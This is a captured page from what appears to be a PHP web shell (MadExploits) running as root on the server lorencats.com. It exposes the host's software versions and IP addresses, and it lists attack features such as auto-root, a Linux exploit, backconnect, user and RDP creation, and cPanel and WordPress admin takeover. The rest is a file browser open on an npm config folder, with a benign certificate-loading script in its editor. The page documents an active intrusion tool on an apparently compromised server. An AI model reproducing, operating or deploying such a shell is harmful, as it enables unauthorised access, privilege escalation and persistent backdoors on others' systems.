Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
lib /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
bin-links.js
716
B
-rw-r--r--
clear-credentials-by-uri.js
423
B
-rw-r--r--
cmd-list.js
1.89
KB
-rw-r--r--
core.js
11.07
KB
-rw-r--r--
defaults.js
11.2
KB
-rw-r--r--
fetch-opts.js
1.93
KB
-rw-r--r--
gentle-fs.js
687
B
-rw-r--r--
get-credentials-by-uri.js
2
KB
-rw-r--r--
lifecycle.js
851
B
-rw-r--r--
load-cafile.js
682
B
-rw-r--r--
load-prefix.js
1.3
KB
-rw-r--r--
load-uid.js
386
B
-rw-r--r--
nerf-dart.js
471
B
-rw-r--r--
pacote.js
4.03
KB
-rw-r--r--
reg-client.js
788
B
-rw-r--r--
set-credentials-by-uri.js
1.24
KB
-rw-r--r--
set-user.js
749
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load-cafile.js
module.exports = loadCAFile var fs = require('fs') function loadCAFile (cafilePath, cb) { if (!cafilePath) return process.nextTick(cb) fs.readFile(cafilePath, 'utf8', afterCARead.bind(this)) function afterCARead (er, cadata) { if (er) { // previous cafile no longer exists, so just continue on gracefully if (er.code === 'ENOENT') return cb() return cb(er) } var delim = '-----END CERTIFICATE-----' var output output = cadata .split(delim) .filter(function (xs) { return !!xs.trim() }) .map(function (xs) { return xs.trimLeft() + delim }) this.set('ca', output) cb(null) } }
Close